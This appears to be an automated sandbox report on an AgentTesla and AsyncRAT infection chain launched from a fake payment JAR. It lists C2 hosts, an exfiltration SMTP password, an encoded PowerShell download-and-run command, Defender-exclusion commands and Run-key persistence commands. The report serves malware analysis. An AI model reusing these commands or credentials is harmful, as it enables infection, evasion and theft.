agenttesla | 702d843adb5178c567c92fcb19571a7d0b8ce1f6ec08e0a82ba6eb2c37026a62

Analysis

max time kernel
146s
max time network
145s
platform
windows7_x64
resource
win7v20201028
submitted
14-03-2021 16:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Payment Details_ 11-03-21.jar
Size

207KB
MD5

10c6eea1c0cfcc698b01deb033d04f83
SHA1

25815e3b45373b89d332fa42fe36a26d7d20c4db
SHA256

702d843adb5178c567c92fcb19571a7d0b8ce1f6ec08e0a82ba6eb2c37026a62
SHA512

01ae4d3dd3a475db95fb1c32e6f6737e5ca06c582179823c8313624b8532fdc7a7c23104eea01f2af70a873757b647977839373aeaf1c6b75bd413a22909584e

Score

10^/10

agenttesla asyncrat evasion keylogger macro persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://transfer.sh/get/dsN3t/word.exe

Extracted

Family

asyncrat

Version

0.5.7B

chongmei33.publicvm.com:2703

chongmei33.publicvm.com:49703

chongmei33.publicvm.com:49746

185.165.153.116:2703

185.165.153.116:49703

185.165.153.116:49746

54.37.36.116:2703

54.37.36.116:49703

54.37.36.116:49746

185.244.30.92:2703

185.244.30.92:49703

185.244.30.92:49746

dongreg202020.duckdns.org:2703

dongreg202020.duckdns.org:49703

dongreg202020.duckdns.org:49746

178.33.222.241:2703

178.33.222.241:49703

178.33.222.241:49746

rahim321.duckdns.org:2703

rahim321.duckdns.org:49703

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
hGScKRB0VrlS4WpFo0N7AmnZQApV4qsi
anti_detection
false
autorun
false
bdos
false
delay
FEB
host
chongmei33.publicvm.com,185.165.153.116,54.37.36.116,185.244.30.92,dongreg202020.duckdns.org,178.33.222.241,rahim321.duckdns.org,79.134.225.92,37.120.208.36,178.33.222.243,87.98.245.48
hwid
3
install_file
install_folder
%AppData%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
2703,49703,49746
version
0.5.7B

aes.plain

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
smtp.gmail.com
Port:
587
Username:
[email protected]
Password:
pifgweijlylkellk

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1472	1780	cmd.exe	EXCEL.EXE

Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

AgentTesla Payload 3 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Roaming\origx.exe	family_agenttesla
C:\Users\Admin\AppData\Roaming\origx.exe	family_agenttesla
C:\Users\Admin\AppData\Roaming\origx.exe	family_agenttesla

Async RAT payload 6 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/2616-207-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/2616-212-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/2616-208-0x000000000040C91E-mapping.dmp	asyncrat
behavioral1/memory/2212-253-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/2212-254-0x000000000040C91E-mapping.dmp	asyncrat
behavioral1/memory/2212-259-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Nirsoft 7 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\cd69ae2c-fd85-42d0-ac16-431d1bac9002\AdvancedRun.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\cd69ae2c-fd85-42d0-ac16-431d1bac9002\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\cd69ae2c-fd85-42d0-ac16-431d1bac9002\AdvancedRun.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\cd69ae2c-fd85-42d0-ac16-431d1bac9002\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\cd69ae2c-fd85-42d0-ac16-431d1bac9002\AdvancedRun.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\cd69ae2c-fd85-42d0-ac16-431d1bac9002\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\cd69ae2c-fd85-42d0-ac16-431d1bac9002\AdvancedRun.exe	Nirsoft

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

11 1512 powershell.exe

flow	pid	process
11	1512	powershell.exe

Executes dropped EXE 8 IoCs

Processes:

4F8spyqvE4Bt.exeAdvancedRun.exeAdvancedRun.exeword.exe4F8spyqvE4Bt.exeorigx.exeDriver auto updater.exeInstallUtil.exe

pid	process
1976	4F8spyqvE4Bt.exe
2308	AdvancedRun.exe
2360	AdvancedRun.exe
2392	word.exe
2616	4F8spyqvE4Bt.exe
2860	origx.exe
2992	Driver auto updater.exe
2212	InstallUtil.exe

Suspicious Office macro 1 IoCs

Office document equipped with macros.

macro

Processes:

resource	yara_rule
C:\Users\Admin\8CVQO3.xlsm	office_macros

Loads dropped DLL 14 IoCs

Processes:

4F8spyqvE4Bt.exeAdvancedRun.exepowershell.exeword.exeDriver auto updater.exeInstallUtil.exe

pid	process
1976	4F8spyqvE4Bt.exe
1976	4F8spyqvE4Bt.exe
2308	AdvancedRun.exe
2308	AdvancedRun.exe
1512	powershell.exe
1512	powershell.exe
2392	word.exe
2392	word.exe
2992	Driver auto updater.exe
2992	Driver auto updater.exe
2992	Driver auto updater.exe
2992	Driver auto updater.exe
2212	InstallUtil.exe
2212	InstallUtil.exe

Windows security modification 2 TTPs 9 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

4F8spyqvE4Bt.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	4F8spyqvE4Bt.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe = "0"	4F8spyqvE4Bt.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\4F8spyqvE4Bt.exe = "0"	4F8spyqvE4Bt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Real-Time Protection	4F8spyqvE4Bt.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	4F8spyqvE4Bt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions	4F8spyqvE4Bt.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	4F8spyqvE4Bt.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0"	4F8spyqvE4Bt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	4F8spyqvE4Bt.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe4F8spyqvE4Bt.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\audio driver = "C:\\Users\\Admin\\Driver auto updater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\sLQZBaMYZTsSnVyqjYgzJYSo = "C:\\Users\\Public\\Documents\\XTKhkdsbOeosQyZPOlewDRV\\svchost.exe"	4F8spyqvE4Bt.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs

Processes:

4F8spyqvE4Bt.exe

pid	process
1976	4F8spyqvE4Bt.exe
1976	4F8spyqvE4Bt.exe
1976	4F8spyqvE4Bt.exe
1976	4F8spyqvE4Bt.exe
1976	4F8spyqvE4Bt.exe
1976	4F8spyqvE4Bt.exe
1976	4F8spyqvE4Bt.exe
1976	4F8spyqvE4Bt.exe
1976	4F8spyqvE4Bt.exe
1976	4F8spyqvE4Bt.exe
1976	4F8spyqvE4Bt.exe
1976	4F8spyqvE4Bt.exe
1976	4F8spyqvE4Bt.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

4F8spyqvE4Bt.exeDriver auto updater.exe

description	pid	process	target process
PID 1976 set thread context of 2616	1976	4F8spyqvE4Bt.exe	4F8spyqvE4Bt.exe
PID 2992 set thread context of 2212	2992	Driver auto updater.exe	InstallUtil.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2548 timeout.exe
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

pid	process
2548	timeout.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1780 EXCEL.EXE

pid	process
1780	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 24 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeAdvancedRun.exeAdvancedRun.exepowershell.exe4F8spyqvE4Bt.exeword.exeorigx.exeDriver auto updater.exe

pid	process
1512	powershell.exe
1512	powershell.exe
1604	powershell.exe
1700	powershell.exe
1724	powershell.exe
1604	powershell.exe
1724	powershell.exe
1700	powershell.exe
2308	AdvancedRun.exe
2308	AdvancedRun.exe
2360	AdvancedRun.exe
2360	AdvancedRun.exe
2488	powershell.exe
2488	powershell.exe
1976	4F8spyqvE4Bt.exe
1976	4F8spyqvE4Bt.exe
1976	4F8spyqvE4Bt.exe
2392	word.exe
2392	word.exe
2392	word.exe
2860	origx.exe
2860	origx.exe
2992	Driver auto updater.exe
2992	Driver auto updater.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

4F8spyqvE4Bt.exepowershell.exepowershell.exepowershell.exepowershell.exeAdvancedRun.exeAdvancedRun.exeword.exepowershell.exeorigx.exeDriver auto updater.exe4F8spyqvE4Bt.exe

description	pid	process
Token: SeDebugPrivilege	1976	4F8spyqvE4Bt.exe
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	2308	AdvancedRun.exe
Token: SeImpersonatePrivilege	2308	AdvancedRun.exe
Token: SeDebugPrivilege	2360	AdvancedRun.exe
Token: SeImpersonatePrivilege	2360	AdvancedRun.exe
Token: SeDebugPrivilege	2392	word.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	2860	origx.exe
Token: SeDebugPrivilege	2992	Driver auto updater.exe
Token: SeDebugPrivilege	2616	4F8spyqvE4Bt.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

java.exeEXCEL.EXE

pid process

792 java.exe
1780 EXCEL.EXE
1780 EXCEL.EXE
1780 EXCEL.EXE
1780 EXCEL.EXE
1780 EXCEL.EXE
1780 EXCEL.EXE
1780 EXCEL.EXE

pid	process
792	java.exe
1780	EXCEL.EXE
1780	EXCEL.EXE
1780	EXCEL.EXE
1780	EXCEL.EXE
1780	EXCEL.EXE
1780	EXCEL.EXE
1780	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

java.exeEXCEL.EXEcmd.exe4F8spyqvE4Bt.exeAdvancedRun.exepowershell.execmd.exe

description	pid	process	target process
PID 792 wrote to memory of 1976	792	java.exe	4F8spyqvE4Bt.exe
PID 792 wrote to memory of 1976	792	java.exe	4F8spyqvE4Bt.exe
PID 792 wrote to memory of 1976	792	java.exe	4F8spyqvE4Bt.exe
PID 792 wrote to memory of 1976	792	java.exe	4F8spyqvE4Bt.exe
PID 792 wrote to memory of 1780	792	java.exe	EXCEL.EXE
PID 792 wrote to memory of 1780	792	java.exe	EXCEL.EXE
PID 792 wrote to memory of 1780	792	java.exe	EXCEL.EXE
PID 792 wrote to memory of 1780	792	java.exe	EXCEL.EXE
PID 792 wrote to memory of 1780	792	java.exe	EXCEL.EXE
PID 792 wrote to memory of 1780	792	java.exe	EXCEL.EXE
PID 792 wrote to memory of 1780	792	java.exe	EXCEL.EXE
PID 792 wrote to memory of 1780	792	java.exe	EXCEL.EXE
PID 792 wrote to memory of 1780	792	java.exe	EXCEL.EXE
PID 1780 wrote to memory of 1472	1780	EXCEL.EXE	cmd.exe
PID 1780 wrote to memory of 1472	1780	EXCEL.EXE	cmd.exe
PID 1780 wrote to memory of 1472	1780	EXCEL.EXE	cmd.exe
PID 1780 wrote to memory of 1472	1780	EXCEL.EXE	cmd.exe
PID 1472 wrote to memory of 1512	1472	cmd.exe	powershell.exe
PID 1472 wrote to memory of 1512	1472	cmd.exe	powershell.exe
PID 1472 wrote to memory of 1512	1472	cmd.exe	powershell.exe
PID 1472 wrote to memory of 1512	1472	cmd.exe	powershell.exe
PID 1976 wrote to memory of 1604	1976	4F8spyqvE4Bt.exe	powershell.exe
PID 1976 wrote to memory of 1604	1976	4F8spyqvE4Bt.exe	powershell.exe
PID 1976 wrote to memory of 1604	1976	4F8spyqvE4Bt.exe	powershell.exe
PID 1976 wrote to memory of 1604	1976	4F8spyqvE4Bt.exe	powershell.exe
PID 1976 wrote to memory of 1700	1976	4F8spyqvE4Bt.exe	powershell.exe
PID 1976 wrote to memory of 1700	1976	4F8spyqvE4Bt.exe	powershell.exe
PID 1976 wrote to memory of 1700	1976	4F8spyqvE4Bt.exe	powershell.exe
PID 1976 wrote to memory of 1700	1976	4F8spyqvE4Bt.exe	powershell.exe
PID 1976 wrote to memory of 1724	1976	4F8spyqvE4Bt.exe	powershell.exe
PID 1976 wrote to memory of 1724	1976	4F8spyqvE4Bt.exe	powershell.exe
PID 1976 wrote to memory of 1724	1976	4F8spyqvE4Bt.exe	powershell.exe
PID 1976 wrote to memory of 1724	1976	4F8spyqvE4Bt.exe	powershell.exe
PID 1976 wrote to memory of 2308	1976	4F8spyqvE4Bt.exe	AdvancedRun.exe
PID 1976 wrote to memory of 2308	1976	4F8spyqvE4Bt.exe	AdvancedRun.exe
PID 1976 wrote to memory of 2308	1976	4F8spyqvE4Bt.exe	AdvancedRun.exe
PID 1976 wrote to memory of 2308	1976	4F8spyqvE4Bt.exe	AdvancedRun.exe
PID 2308 wrote to memory of 2360	2308	AdvancedRun.exe	AdvancedRun.exe
PID 2308 wrote to memory of 2360	2308	AdvancedRun.exe	AdvancedRun.exe
PID 2308 wrote to memory of 2360	2308	AdvancedRun.exe	AdvancedRun.exe
PID 2308 wrote to memory of 2360	2308	AdvancedRun.exe	AdvancedRun.exe
PID 1512 wrote to memory of 2392	1512	powershell.exe	word.exe
PID 1512 wrote to memory of 2392	1512	powershell.exe	word.exe
PID 1512 wrote to memory of 2392	1512	powershell.exe	word.exe
PID 1512 wrote to memory of 2392	1512	powershell.exe	word.exe
PID 1976 wrote to memory of 2488	1976	4F8spyqvE4Bt.exe	powershell.exe
PID 1976 wrote to memory of 2488	1976	4F8spyqvE4Bt.exe	powershell.exe
PID 1976 wrote to memory of 2488	1976	4F8spyqvE4Bt.exe	powershell.exe
PID 1976 wrote to memory of 2488	1976	4F8spyqvE4Bt.exe	powershell.exe
PID 1976 wrote to memory of 2512	1976	4F8spyqvE4Bt.exe	cmd.exe
PID 1976 wrote to memory of 2512	1976	4F8spyqvE4Bt.exe	cmd.exe
PID 1976 wrote to memory of 2512	1976	4F8spyqvE4Bt.exe	cmd.exe
PID 1976 wrote to memory of 2512	1976	4F8spyqvE4Bt.exe	cmd.exe
PID 2512 wrote to memory of 2548	2512	cmd.exe	timeout.exe
PID 2512 wrote to memory of 2548	2512	cmd.exe	timeout.exe
PID 2512 wrote to memory of 2548	2512	cmd.exe	timeout.exe
PID 2512 wrote to memory of 2548	2512	cmd.exe	timeout.exe
PID 1976 wrote to memory of 2616	1976	4F8spyqvE4Bt.exe	4F8spyqvE4Bt.exe
PID 1976 wrote to memory of 2616	1976	4F8spyqvE4Bt.exe	4F8spyqvE4Bt.exe
PID 1976 wrote to memory of 2616	1976	4F8spyqvE4Bt.exe	4F8spyqvE4Bt.exe
PID 1976 wrote to memory of 2616	1976	4F8spyqvE4Bt.exe	4F8spyqvE4Bt.exe
PID 1976 wrote to memory of 2616	1976	4F8spyqvE4Bt.exe	4F8spyqvE4Bt.exe
PID 1976 wrote to memory of 2616	1976	4F8spyqvE4Bt.exe	4F8spyqvE4Bt.exe
PID 1976 wrote to memory of 2616	1976	4F8spyqvE4Bt.exe	4F8spyqvE4Bt.exe

C:\Windows\system32\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\Payment Details_ 11-03-21.jar"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:792

C:\Users\Admin\4F8spyqvE4Bt.exe
C:\Users\Admin\4F8spyqvE4Bt.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\4F8spyqvE4Bt.exe" -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724

C:\Users\Admin\AppData\Local\Temp\cd69ae2c-fd85-42d0-ac16-431d1bac9002\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\cd69ae2c-fd85-42d0-ac16-431d1bac9002\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\cd69ae2c-fd85-42d0-ac16-431d1bac9002\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2308

C:\Users\Admin\AppData\Local\Temp\cd69ae2c-fd85-42d0-ac16-431d1bac9002\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\cd69ae2c-fd85-42d0-ac16-431d1bac9002\AdvancedRun.exe" /SpecialRun 4101d8 2308
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2360

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\4F8spyqvE4Bt.exe" -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2488

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1
3⤵
- Suspicious use of WriteProcessMemory
PID:2512

C:\Windows\SysWOW64\timeout.exe
timeout 1
4⤵
- Delays execution with timeout.exe
PID:2548

C:\Users\Admin\4F8spyqvE4Bt.exe
"C:\Users\Admin\4F8spyqvE4Bt.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2616

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
2⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AdAByAGEAbgBzAGYAZQByAC4AcwBoAC8AZwBlAHQALwBkAHMATgAzAHQALwB3AG8AcgBkAC4AZQB4AGUAJwAsACgAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAKQArACcAXAB3AG8AcgBkAC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdwBvAHIAZAAuAGUAeABlAA==
3⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1472

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AdAByAGEAbgBzAGYAZQByAC4AcwBoAC8AZwBlAHQALwBkAHMATgAzAHQALwB3AG8AcgBkAC4AZQB4AGUAJwAsACgAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAKQArACcAXAB3AG8AcgBkAC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdwBvAHIAZAAuAGUAeABlAA==
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1512

C:\Users\Admin\AppData\Roaming\word.exe
"C:\Users\Admin\AppData\Roaming\word.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audio driver" /t REG_SZ /d "C:\Users\Admin\Driver auto updater.exe"
6⤵
PID:2760

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audio driver" /t REG_SZ /d "C:\Users\Admin\Driver auto updater.exe"
7⤵
- Adds Run key to start application
PID:2784

C:\Users\Admin\AppData\Roaming\origx.exe
"C:\Users\Admin\AppData\Roaming\origx.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860

C:\Users\Admin\Driver auto updater.exe
"C:\Users\Admin\Driver auto updater.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2992

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2212

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\4F8spyqvE4Bt.exe
MD5
ad8419daca748a16ae9eb38c74e7cf9b

SHA1
3ea138f11cc51fa421839a505bc869ec3eb3b5db

SHA256
a5098d0d640ceee9650cdbdf2b7dc300f9852620307c3f67b37752222716a3fc

SHA512
a333f28922cabb59dbd204f58e4291120d7d23b6786970de5f27c7dfbe8acb0bf47ff2abccfd455cc18e17686509e49949aeb04fbd42de0946c97594e1f24d5b

Download Submit
C:\Users\Admin\4F8spyqvE4Bt.exe
MD5
ad8419daca748a16ae9eb38c74e7cf9b

SHA1
3ea138f11cc51fa421839a505bc869ec3eb3b5db

SHA256
a5098d0d640ceee9650cdbdf2b7dc300f9852620307c3f67b37752222716a3fc

SHA512
a333f28922cabb59dbd204f58e4291120d7d23b6786970de5f27c7dfbe8acb0bf47ff2abccfd455cc18e17686509e49949aeb04fbd42de0946c97594e1f24d5b

Download Submit
C:\Users\Admin\4F8spyqvE4Bt.exe
MD5
ad8419daca748a16ae9eb38c74e7cf9b

SHA1
3ea138f11cc51fa421839a505bc869ec3eb3b5db

SHA256
a5098d0d640ceee9650cdbdf2b7dc300f9852620307c3f67b37752222716a3fc

SHA512
a333f28922cabb59dbd204f58e4291120d7d23b6786970de5f27c7dfbe8acb0bf47ff2abccfd455cc18e17686509e49949aeb04fbd42de0946c97594e1f24d5b

Download Submit
C:\Users\Admin\8CVQO3.xlsm
MD5
7246f57d869fefa7d9d0505bbdf5ceff

SHA1
d20bace71966f4160a6afcb6ade687bddd313bac

SHA256
340e3184edceed4d23fd81d82a900977f32134328803096c5f5712482e4ed6f6

SHA512
4a524d82ad45c779507d0078f43d5fd51c935e96fc8742e10b2a557202770eaff46e5723af7d91366c44d23c4efd06fc7a2a95295e9f3e6914cf265aa1e06801

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_02f16c31-bbf9-45a9-a155-844f9f921b35
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
